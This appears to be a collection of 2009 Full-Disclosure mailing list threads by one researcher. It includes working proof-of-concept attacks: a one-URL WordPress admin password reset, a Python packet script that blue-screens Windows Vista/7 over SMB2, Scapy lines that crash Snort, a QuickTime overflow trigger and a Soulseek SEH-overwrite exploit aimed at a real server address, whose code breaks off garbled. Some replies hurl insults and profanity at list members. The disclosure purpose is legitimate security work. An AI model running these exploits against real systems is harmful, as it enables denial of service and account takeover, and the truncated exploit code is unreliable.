> > The way Wordpress handle a password reset looks like this:
> > You submit your email adress or username via this form
> > /wp-login.php?action=lostpassword ;
> > Wordpress send you a reset confirmation like that via email:
>
> > "
> > Someone has asked to reset the password for the following site and
> username.
> > http://DOMAIN_NAME.TLD/wordpress
> > Username: admin
> > To reset your password visit the following address, otherwise just ignore
> > this email and nothing will happen
>
> >
> http://DOMAIN_NAME.TLD/wordpress/wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag
> > "
>
> > You click on the link, and then Wordpress reset your admin password, and
> > sends you over another email with your new credentials.
>
> > Let's see how it works:
>
>
> > wp-login.php:
> > ...[snip]
> > line 186:
> > function reset_password($key) {
> > global $wpdb;
>
> > $key = preg_replace('/[^a-z0-9]/i', '', $key);
>
> > if ( empty( $key ) )
> > return new WP_Error('invalid_key', __('Invalid key'));
>
> > $user = $wpdb->get_row($wpdb->prepare("SELECT * FROM $wpdb->users
> WHERE
> > user_activation_key = %s", $key));
> > if ( empty( $user ) )
> > return new WP_Error('invalid_key', __('Invalid key'));
> > ...[snip]
> > line 276:
> > $action = isset($_REQUEST['action']) ? $_REQUEST['action'] : 'login';
> > $errors = new WP_Error();
>
> > if ( isset($_GET['key']) )
> > $action = 'resetpass';
>
> > // validate action so as to default to the login screen
> > if ( !in_array($action, array('logout', 'lostpassword',
> 'retrievepassword',
> > 'resetpass', 'rp', 'register', 'login')) && false ===
> > has_filter('login_form_' . $action) )
> > $action = 'login';
> > ...[snip]
>
> > line 370:
>
> > break;
>
> > case 'resetpass' :
> > case 'rp' :
> > $errors = reset_password($_GET['key']);
>
> > if ( ! is_wp_error($errors) ) {
> > wp_redirect('wp-login.php?checkemail=newpass');
> > exit();
> > }
>
> > wp_redirect('wp-login.php?action=lostpassword&error=invalidkey');
> > exit();
>
> > break;
> > ...[snip ]...
>
> > You can abuse the password reset function, and bypass the first step and
> > then reset the admin password by submiting an array to the $key variable.
>
>
> > IV. PROOF OF CONCEPT
> > -
> > A web browser is sufficiant to reproduce this Proof of concept:
> > http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key[]=
> > The password will be reset without any confirmation.
>
> > V. BUSINESS IMPACT
> > -
> > An attacker could exploit this vulnerability to compromise the admin
> account
> > of any wordpress/wordpress-mu <= 2.8.3
>
> > VI. SYSTEMS AFFECTED
> > -
> > All
>
> > VII. SOLUTION
> > -
> > No patch aviable for the moment.
>
> > VIII. REFERENCES
> > -
> > http://www.wordpress.org
>
> > IX. CREDITS
> > -
> > This vulnerability has been discovered by Laurent Gaffié
> > Laurent.gaffie{remove-this}(at)gmail.com
> > I'd like to shoot some greetz to securityreason.com for them great
> research
> > on PHP, as for this under-estimated vulnerability discovered by
> Maksymilian
> > Arciemowicz :
> > http://securityreason.com/achievement_securityalert/38
>
> > X. REVISION HISTORY
> > -
> > August 10th, 2009: Initial release
>
> > XI. LEGAL NOTICES
> > -
> > The information contained within this advisory is supplied "as-is"
> > with no warranties or guarantees of fitness of use or otherwise.
> > I accept no responsibility for any damage caused by the use or
> > misuse of this information.
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-discl

Re: [Full-disclosure] WordPress <= 2.8.3 Remote admin reset password

[laurent gaffie]

Hi there,
"What would the "attacker" submit as a query to the server?"

Simply:
/wp-login.php?action=rp&key[]=<http://domain_name.tld/wp-login.php?action=rp&key%5B%5D=>

And the admin passwd would be reseted.

Regards.


2009/8/11 Rafal M. Los 

>  Hi Laurent,
> Pardon my stupidity... I seem to be missing something tonight.  Can
> you explain a little further for someone who doesn’t have coding (php)
> background?  What would the "attacker" submit as a query to the server?
> What specifically triggers the vulnerabiilty?
> .
>
> Rafal M. Los
> Security & IT Risk Strategist
>
>  - Blog: http://preachsecurity.blogspot.com
>  - LinkedIn:  http://www.linkedin.com/in/rmlos
>  - Twitter: http://twitter.com/RafalLos
>
>  *From:* laurent gaffie 
> *Sent:* Monday, August 10, 2009 9:09 PM
> *To:* full-disclosure@lists.grok.org.uk
> *Subject:* [Full-disclosure] WordPress <= 2.8.3 Remote admin reset
> password
>
> =
> - Release date: August 10th, 2009
> - Discovered by: Laurent Gaffié
> - Severity: Medium
> =
>
> I. VULNERABILITY
> -
> WordPress <= 2.8.3 Remote admin reset password
>
> II. BACKGROUND
> -
> WordPress is a state-of-the-art publishing platform with a focus on
> aesthetics, web standards, and usability.
> WordPress is both free and priceless at the same time.
> More simply, WordPress is what you use when you want to work with your
> blogging software, not fight it.
>
> III. DESCRIPTION
> -
> The way Wordpress handle a password reset looks like this:
> You submit your email adress or username via this form
> /wp-login.php?action=lostpassword ;
> Wordpress send you a reset confirmation like that via email:
>
> "
> Someone has asked to reset the password for the following site and
> username.
> http://DOMAIN_NAME.TLD/wordpress
> Username: admin
> To reset your password visit the following address, otherwise just ignore
> this email and nothing will happen
>
>
> http://DOMAIN_NAME.TLD/wordpress/wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag
> "
>
> You click on the link, and then Wordpress reset your admin password, and
> sends you over another email with your new credentials.
>
> Let's see how it works:
>
>
> wp-login.php:
> ...[snip]
> line 186:
> function reset_password($key) {
> global $wpdb;
>
> $key = preg_replace('/[^a-z0-9]/i', '', $key);
>
> if ( empty( $key ) )
> return new WP_Error('invalid_key', __('Invalid key'));
>
> $user = $wpdb->get_row($wpdb->prepare("SELECT * FROM $wpdb->users WHERE
> user_activation_key = %s", $key));
> if ( empty( $user ) )
> return new WP_Error('invalid_key', __('Invalid key'));
> ...[snip]
> line 276:
> $action = isset($_REQUEST['action']) ? $_REQUEST['action'] : 'login';
> $errors = new WP_Error();
>
> if ( isset($_GET['key']) )
> $action = 'resetpass';
>
> // validate action so as to default to the login screen
> if ( !in_array($action, array('logout', 'lostpassword', 'retrievepassword',
> 'resetpass', 'rp', 'register', 'login')) && false ===
> has_filter('login_form_' . $action) )
> $action = 'login';
> ...[snip]
>
> line 370:
>
> break;
>
> case 'resetpass' :
> case 'rp' :
> $errors = reset_password($_GET['key']);
>
> if ( ! is_wp_error($errors) ) {
> wp_redirect('wp-login.php?checkemail=newpass');
> exit();
> }
>
> wp_redirect('wp-login.php?action=lostpassword&error=invalidkey');
> exit();
>
> break;
> ...[snip ]...
>
> You can abuse the password reset function, and bypass the first step and
> then reset the admin password by submiting an array to the $key variable.
>
>
> IV. PROOF OF CONCEPT
> -
> A web browser is sufficiant to reproduce this Proof of concept:
> http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key[]=<http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key%5B%5D=>
> The password will be reset without any confirmation.
>
> V. BUSINESS IMPACT
> -
> An attacker could exploit this vulnerability to compromise the admin
> account of any wordpress/wordpress-mu <= 2.8.3
>
> VI. SYSTEMS AFFECTED
> 

Re: [Full-disclosure] WordPress <= 2.8.3 Remote admin reset password

[laurent gaffie]

"Rafal M. Los
Security & IT Risk Strategist"

where  ?

@home ?
oh boy.



2009/8/11 Rafal M. Los 

>  Empty reply... on purpose or...?
> .
>
> Rafal
>
>  *From:* laurent gaffie 
> *Sent:* Monday, August 10, 2009 11:43 PM
> *To:* Rafal M. Los 
> *Subject:* Re: [Full-disclosure] WordPress <= 2.8.3 Remote admin reset
> password
>
>
>
> 2009/8/11 Rafal M. Los 
>
>>  Hi Laurent,
>> Pardon my stupidity... I seem to be missing something tonight.  Can
>> you explain a little further for someone who doesn’t have coding (php)
>> background?  What would the "attacker" submit as a query to the server?
>> What specifically triggers the vulnerabiilty?
>> .
>>
>> Rafal M. Los
>> Security & IT Risk Strategist
>>
>>  - Blog: http://preachsecurity.blogspot.com
>>  - LinkedIn:  http://www.linkedin.com/in/rmlos
>>  - Twitter: http://twitter.com/RafalLos
>>
>>  *From:* laurent gaffie 
>> *Sent:* Monday, August 10, 2009 9:09 PM
>> *To:* full-disclosure@lists.grok.org.uk
>> *Subject:* [Full-disclosure] WordPress <= 2.8.3 Remote admin reset
>> password
>>
>> =
>> - Release date: August 10th, 2009
>> - Discovered by: Laurent Gaffié
>> - Severity: Medium
>> =
>>
>> I. VULNERABILITY
>> -
>> WordPress <= 2.8.3 Remote admin reset password
>>
>> II. BACKGROUND
>> -
>> WordPress is a state-of-the-art publishing platform with a focus on
>> aesthetics, web standards, and usability.
>> WordPress is both free and priceless at the same time.
>> More simply, WordPress is what you use when you want to work with your
>> blogging software, not fight it.
>>
>> III. DESCRIPTION
>> -
>> The way Wordpress handle a password reset looks like this:
>> You submit your email adress or username via this form
>> /wp-login.php?action=lostpassword ;
>> Wordpress send you a reset confirmation like that via email:
>>
>> "
>> Someone has asked to reset the password for the following site and
>> username.
>> http://DOMAIN_NAME.TLD/wordpress
>> Username: admin
>> To reset your password visit the following address, otherwise just ignore
>> this email and nothing will happen
>>
>>
>> http://DOMAIN_NAME.TLD/wordpress/wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag
>> "
>>
>> You click on the link, and then Wordpress reset your admin password, and
>> sends you over another email with your new credentials.
>>
>> Let's see how it works:
>>
>>
>> wp-login.php:
>> ...[snip]
>> line 186:
>> function reset_password($key) {
>> global $wpdb;
>>
>> $key = preg_replace('/[^a-z0-9]/i', '', $key);
>>
>> if ( empty( $key ) )
>> return new WP_Error('invalid_key', __('Invalid key'));
>>
>> $user = $wpdb->get_row($wpdb->prepare("SELECT * FROM $wpdb->users
>> WHERE user_activation_key = %s", $key));
>> if ( empty( $user ) )
>> return new WP_Error('invalid_key', __('Invalid key'));
>> ...[snip]
>> line 276:
>> $action = isset($_REQUEST['action']) ? $_REQUEST['action'] : 'login';
>> $errors = new WP_Error();
>>
>> if ( isset($_GET['key']) )
>> $action = 'resetpass';
>>
>> // validate action so as to default to the login screen
>> if ( !in_array($action, array('logout', 'lostpassword',
>> 'retrievepassword', 'resetpass', 'rp', 'register', 'login')) && false ===
>> has_filter('login_form_' . $action) )
>> $action = 'login';
>> ...[snip]
>>
>> line 370:
>>
>> break;
>>
>> case 'resetpass' :
>> case 'rp' :
>> $errors = reset_password($_GET['key']);
>>
>> if ( ! is_wp_error($errors) ) {
>> wp_redirect('wp-login.php?checkemail=newpass');
>> exit();
>> }
>>
>> wp_redirect('wp-login.php?action=lostpassword&error=invalidkey');
>> exit();
>>
>> break;
>> ...[snip ]...
>>
>> You can abuse the password reset function, and bypass the first step and
>> then reset the admin password b

Re: [Full-disclosure] WordPress <= 2.8.3 Remote admin reset password

[laurent gaffie]

Dude, your email is more funny, than serious.
It's a pure troll.
What ever from now on.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] WordPress <= 2.8.3 Remote admin reset password

[laurent gaffie]

Mr Fabio,

You dont even understand the bug, so please shut the hell up.






2009/8/11 Fabio N Sarmento [ Gmail ] 

> if this is an bug, please close Twitter.com, MSN.com and other services,
> because they have the same stupid "Reset password" service.
>
> So please make my day, and create a stupid script to flood with mutiple
> request to reset password.
>
> LOL
>
> 2009/8/10 Jeremy Brown <0xjbrow...@gmail.com>
>
> I'm guessing your not a Wordpress administrator, Fabio. Nice find
>> Laurent, as usual.
>>
>> On Mon, Aug 10, 2009 at 10:48 PM, laurent
>> gaffie wrote:
>> > Oh ok.
>> > Then, let's avoid that function.
>> > If it's useless to have a function who validate a reset passwd before
>> > resetting it, let's just avoid it smartass.
>> >
>> >
>> > 2009/8/10 Fabio N Sarmento [ Gmail ] 
>> >>
>> >> There is no risk on this.
>> >> It's just a little flaw, it doesn't broke anything or put your admin
>> >> access in risk.
>> >>
>> >> :-P to me , this vulnerability is more "BUZZ" then real deal. LOL
>> >>
>> >> 2009/8/10 laurent gaffie 
>> >>>
>> >>> Hi there,
>> >>>
>> >>> This wasn't tested on the 2.7* branch.
>> >>> It as been tested on the  2.8.* branch, with php 5.3.0 & php 5.2.9 as
>> an
>> >>> Apache 2.2.12 module, on a linux env.
>> >>>
>> >>>
>> >>> Regards Laurent Gaffié
>> >>>
>> >>>
>> >>>
>> >>> 2009/8/10 Nicolas Valcárcel Scerpella <
>> nicolas.valcar...@canonical.com>
>> >>>>
>> >>>> I don't see the issue with wp 2.7.1
>> >>>>
>> >>>> On Mon, 10 Aug 2009, laurent gaffie wrote:
>> >>>>
>> >>>> > Errata:
>> >>>> >
>> >>>> > "V. BUSINESS IMPACT
>> >>>> > -
>> >>>> > An attacker could exploit this vulnerability to compromise the
>> admin
>> >>>> > account
>> >>>> > of any wordpress/wordpress-mu <= 2.8.3"
>> >>>> >
>> >>>> > -->
>> >>>> >
>> >>>> > "V. BUSINESS IMPACT
>> >>>> > -
>> >>>> > An attacker could exploit this vulnerability to reset the admin
>> >>>> > account of
>> >>>> > any wordpress/wordpress-mu <= 2.8.3"
>> >>>> >
>> >>>> >
>> >>>> > Regards Laurent Gaffié
>> >>>> >
>> >>>> >
>> >>>> > 2009/8/10 laurent gaffie 
>> >>>> >
>> >>>> > > =
>> >>>> > > - Release date: August 10th, 2009
>> >>>> > > - Discovered by: Laurent Gaffié
>> >>>> > > - Severity: Medium
>> >>>> > > =
>> >>>> > >
>> >>>> > > I. VULNERABILITY
>> >>>> > > -
>> >>>> > > WordPress <= 2.8.3 Remote admin reset password
>> >>>> > >
>> >>>> > > II. BACKGROUND
>> >>>> > > -
>> >>>> > > WordPress is a state-of-the-art publishing platform with a focus
>> on
>> >>>> > > aesthetics, web standards, and usability.
>> >>>> > > WordPress is both free and priceless at the same time.
>> >>>> > > More simply, WordPress is what you use when you want to work with
>> >>>> > > your
>> >>>> > > blogging software, not fight it.
>> >>>> > >
>> >>>> > > III. DESCRIPTION
>> >>>> > > -
>> >>>> > > The way Wordpress handle a password reset looks like this:
>> >>>> > > You submit your email adress or username via this form
>> >>>> > > /wp-login.php?action=lostpassword ;
>> >>>> > > Wordpress send you a reset confirmation like that via email:
>> >>>> > >
&

Re: [Full-disclosure] Microsoft Internet Information Server ftpd zeroday

[laurent gaffie]

Nice find Kingcope,
As Thierry mentioned it, i guess it was a pain to find it, nice one as
always, your finding rocks.
Cheers

2009/8/31 r1d1nd1rty 

> why would anyone write a 0day with...
>
> # bug found & exploited by Kingcope, kcope2googlemail.com
> # Affects IIS6 with stack cookie protection
> # August 2009 - KEEP THIS 0DAY PRIV8
>
> ... then plaster it all over the internet? have you forgotten what
> you, yourself wrote?
>
> if you guys really wanna get that famous.. perhaps you should
> consider a new career - nobody even likes h4ck3rs these days anyway
> (especially james and da internet po-po).
>
> and please put a fkn' sleep in ur while(1)'s after a fork()... it
> appears as though you couldn't WAIT to get this one out...
>
> /rd
>
> remember to always r1d3 d1r7y n' bounce em.
>
> On Mon, 31 Aug 2009 16:31:51 -0400 Kingcope 
> wrote:
> >Hello list,
> >
> >I have to clarify some things on the globbing vulnerability here.
> >The posted PoC (with the fine art) does NOT exploit IIS6 ftp
> >servers,
> >IIS6 ftp server IS affected by the buffer overflow but is properly
> >protected
> >by stack canaries. AFAIK it looks like a DoS on Windows Server
> >2003.
> >Until someone finds a way to bypass Stack Canaries on recent
> >Windows
> >versions this remains a DoS on IIS6.
> >
> >Thanks to HD Moore and all people in the past you wrote exploits
> >for
> >my releases!
> >Kudos!
> >
> >Nikolaos
> >
> >2009/8/31 Kingcope :
> >> (see attachment)
> >>
> >> Cheerio,
> >>
> >> Kingcope
> >>
> >
> >___
> >Full-Disclosure - We believe in it.
> >Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >Hosted and sponsored by Secunia - http://secunia.com/
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

[laurent gaffie]

=
- Release date: September 7th, 2009
- Discovered by: Laurent Gaffié
- Severity: Medium/High
=

I. VULNERABILITY
-
Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

II. BACKGROUND
-
Windows vista and newer Windows comes with a new SMB version named SMB2.
See:
http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0
for more details.

III. DESCRIPTION
-
SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE PROTOCOL
REQUEST functionnality.
The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send to a SMB
server, and it's used
to identify the SMB dialect that will be used for futher communication.

IV. PROOF OF CONCEPT
-

Smb-Bsod.py:

#!/usr/bin/python
# When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field
it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA

from socket import socket
from time import sleep

host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()

V. BUSINESS IMPACT
-
An attacker can remotly crash without no user interaction, any Vista/Windows
7 machine with SMB enable.
Windows Xp, 2k, are NOT affected as they dont have this driver.

VI. SYSTEMS AFFECTED
-
Windows Vista/7 All (64b/32b|SP1/SP2 fully updated) and possibly Win Server
2008
as it use the same SMB2.0 driver (not tested).

VII. SOLUTION
-
Vendor contacted, but no patch available for the moment.
Close SMB feature and ports, until a patch is provided.

VIII. REFERENCES
-
http://microsoft.com

IX. CREDITS
-
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com
http://g-laurent.blogspot.com/

X. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

[laurent gaffie]

Advisory updated :


=
- Release date: September 7th, 2009
- Discovered by: Laurent Gaffié
- Severity: High
=

I. VULNERABILITY
-
Windows Vista, Server 2008 < R2, 7 RC :
SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

II. BACKGROUND
-
Windows vista and newer Windows comes with a new SMB version named SMB2.
See:
http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0
for more details.

III. DESCRIPTION
-
[Edit]Unfortunatly this SMB2 security issue is specificaly due to a MS
patch, for another SMB2.0 security issue:
KB942624 (MS07-063)
Installing only this specific update on Vista SP0 create the following
issue:

SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE PROTOCOL
REQUEST functionnality.
The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send to a SMB
server, and it's used to identify the SMB dialect that will be used for
futher communication.

IV. PROOF OF CONCEPT
-

Smb-Bsod.py:

#!/usr/bin/python
#When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field
#it dies with a PAGE_FAULT_IN_NONPAGED_AREA error

from socket import socket

host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()

V. BUSINESS IMPACT
-
An attacker can remotly crash any Vista/Windows 7 machine with SMB enable.
Windows Xp, 2k, are NOT affected as they dont have this driver.

VI. SYSTEMS AFFECTED
-
[Edit]Windows Vista All (64b/32b|SP1/SP2 fully updated), Win Server 2008 <
R2, Windows 7 RC.

VII. SOLUTION
-
No patch available for the moment.
Close SMB feature and ports, until a patch is provided.
Configure your firewall properly
You can also follow the MS Workaround:
http://www.microsoft.com/technet/security/advisory/975497.mspx

VIII. REFERENCES
-
http://www.microsoft.com/technet/security/advisory/975497.mspx
http://blogs.technet.com/msrc/archive/2009/09/08/microsoft-security-advisory-975497-released.aspx

IX. CREDITS
-
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com

X. REVISION HISTORY
-
September 7th, 2009: Initial release
September 11th, 2009: Revision 1.0 release

XI. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.

XII.Personal Notes
-
Many persons have suggested to update this advisory for RCE and not BSOD:
It wont be done, if they find a way to execute code, they will publish them
advisory.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

[laurent gaffie]

More explication on cve-2009-3103

http://g-laurent.blogspot.com/2009/10/more-explication-on-cve-2009-3103.html
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Snort <= 2.8.5 IPV6 Remote DoS

[laurent gaffie]

=
- Date: October 22th, 2009
- Discovered by: Laurent Gaffié
- Severity: Low
=

I. VULNERABILITY
-
Snort <= 2.8.5 IPV6 Remote DoS


II. DESCRIPTION
-
A remote DoS was present in Snort 2.8.5 when parsing some specialy IPv6
crafted packet
To trigger theses bugs you need to have compiled snort with the
--enable-ipv6 option, and run it in verbose mode (-v)

III. PROOF OF CONCEPT
-
You can reproduce theses two differents bugs easily by using the Python
low-level networking lib Scapy
(http://www.secdev.org/projects/scapy/files/scapy-latest.zip)

1) #only works on x86

#/usr/bin/env python
from scapy.all import *
u = "\x92"+"\x02" * 6
send(IPv6(dst="IPv6_addr_here", nh=6)/u) #nh6 -> TCP

2) # works x86,x64

#/usr/bin/env python
from scapy.all import *

z = "Q" * 30
send(IPv6(dst="IPv6_ADDR_HERE",nh=1)/ICMPv6NIQueryNOOP(type=4)/z) #nh1 ->
icmp (not v6)


IV. SYSTEMS AFFECTED
-
Theses proof of concept as been tested on snort:
- 2.8.5

V. NOT AFFECTED
-
Sourcefire 3D Sensor


VI. SOLUTION
-
A new version correcting theses issues as been released (2.8.5.1) :

http://www.snort.org/downloads


VII. REFERENCES
-
http://www.snort.org/
http://vrt-sourcefire.blogspot.com/

VIII. REVISION HISTORY
-
October 14th, 2009: First issue discovered, advisory send to snort team.
October 14th, 2009: Snort security team confirm the bug.
October 16th, 2009: Second issue discovered, advisory send to snort team.
October 20th, 2009: Snort security team confirm the bug.
October 22th, 2009: Snort team released a new version.


IX. CREDITS
-
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Hash

[laurent gaffie]

For the record :
/usr/bin/shasum advisory.txt
9fefeeb9d3ebf7c6822961e59ae94cfb655bcd53  advisory.txt

Regards,
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] QuickTime <= 7.4.1 QTPlugin.ocx Multiple Remote Stack Overflow

[laurent gaffie]

Application: QuickTime <= 7.4.1 QTPlugin.ocx Multiple Remote Stack Overflow

Web Site: http://www.apple.com/fr/quicktime/download/

Platform: Windows

Bug: Multiple Remote Stack Overflow

---

1) Introduction

2) Bug

3) Proof of concept

4) Credits

===

1) Introduction

===

A nice introduction to Quicktime Player can be found here :
http://www.apple.com/quicktime/player/

==

2) Bug

==

Stack Overflow/Denial of service occurs when supplying a long string to
theses functions:

-SetBgColor
-SetHREF
-SetMovieName
-SetTarget
-SetMatrix

=

3)Proof of concept

=

Proof of concept example [works with the others functions supplyed in
section 2) ] :




sub test()
bar = String(515305, "A")
foo.SetBgColor bar
End Sub



=

5)Credits

=
laurent gaffié
laurent.gaffie{remove_this}[at]gmail[dot]com
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Soulseek * P2P Remote Distributed Search Code Execution

[laurent gaffie]

=
- Release date: May 24th, 2009
- Discovered by: Laurent Gaffié
- Severity: critical
=

I. VULNERABILITY
-
Soulseek 157 NS * & 156.* Remote Distributed Search Code Execution

II. BACKGROUND
-
"Soulseek(tm) is a unique ad-free, spyware free, and just plain free file
sharing application.
One of the things that makes Soulseek(tm) unique is our community and
community-related features.
Based on peer-to-peer technology, virtual rooms allow you to meet people
with
the same interests, share information, and chat freely using real-time
messages
in public or private.
Soulseek(tm), with its built-in people matching system, is a great way to
make
new friends and expand your mind!"

III. DESCRIPTION
-
Soulseek client allows distributed file search to one person, everyone, or
in a
specific Soulseek IRC channel, allowing a user to find the files he wants,
in
a dedicated channel, or with his contacts, or on the whole network.
Unfortunatly this feature is vulnerable to a remote SEH overwrite to a
specific
user, or even to a whole Soulseek IRC channel.

IV. PROOF OF CONCEPT
-
This proof of concept is made to prevent a S-K party, it is only build to
target the user "testt4321".

To try this proof of concept, you would have to open a soulseek client and
use
the username:
"testt4321"
with the password:
"12345678"
And launch this code.
If you want to change the username or target a whole channel, you would have

to reverse the binary protocol



#!/usr/bin/python
import struct
import sys, socket
from time import *

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("208.76.170.50",2242))  # Change to Port 2240 for 156* branch

buffer = "\x48\x00\x00\x00\x01\x00\x00\x00\x08\x00\x00\x00\x74\x65\x73\x74"
buffer+= "\x34\x33\x32\x31\x08\x00\x00\x00\x31\x32\x33\x34\x35\x36\x37\x38"
buffer+= "\xb5\x00\x00\x00\x20\x00\x00\x00\x38\x65\x39\x31\x66\x37\x33\x30"
buffer+= "\x35\x35\x37\x31\x32\x35\x64\x37\x34\x39\x32\x34\x62\x64\x66\x35"
buffer+= "\x63\x32\x39\x61\x36\x37\x64\x61\x01\x00\x00\x00"

s.send(buffer)
sleep(1)

junk = "\x41" * 3084
next_seh = struct.pack('http://nicotine-plus.sourceforge.net/)
a Python Soulseek client.
Another quick workaround (at server level) would be to limit the search
query lenght.

VIII. REFERENCES
-
http://www.slsknet.org

IX. CREDITS
-
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com


X. REVISION HISTORY
-
May 24, 2009: Initial release


XI. DISCLOSURE TIMELINE
-
july  29, 2008: Bug discovered
September 03, 2008: Vendor contacted; no response.
October   14, 2008: Vendor contacted; still no response.
April 12, 2009: Idefense contacted.
April 13, 2009: Idefense answered.
April 23, 2009: Advisory send to idefense contributor program.
May   13, 2009: Idefense contacted, bug rejected (no reason given)
May   15, 2009: Idefense recontacted; no answer.
May   16, 2009: Last try to contact Soulseek maintainers
May   24, 2009: Advisory published.

XII. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Soulseek * P2P Remote Distributed Search Code Execution

[laurent gaffie]

It seem like you're an asshole, and also it seems you have some undisclosed
brain-prick activity, which mean that i should foward all the spams i get to
you , including "*Ritalin solution"*, get valium, and clearly: enlarge your
penis ( as your girlfriend asked me to do that call for you )

Now if you please, get the fuck out of this mailing list, and get a life
kid.



009/6/5 Pete Licoln 

> Seems like you have a problem with responsible disclosure Kid ;
